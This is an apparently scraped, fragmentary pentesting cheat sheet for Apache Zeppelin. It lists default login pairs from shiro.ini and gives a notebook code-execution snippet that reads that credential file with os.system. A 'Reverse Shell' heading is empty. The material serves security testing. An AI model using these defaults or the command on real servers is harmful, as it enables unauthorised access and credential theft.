Apache Zeppelin Pentesting
Authentication Config File
/shiro.iniDefault Credentials
admin:admin
admin:password1
user1:password2
user1:role1
user1:role2
user2:password3
user2:role3
user3:password4
user3:role2RCE in Notebooks
%python
import os
# Configurations
os.system('cat conf/shiro.ini')Reverse Shell
References
Last updated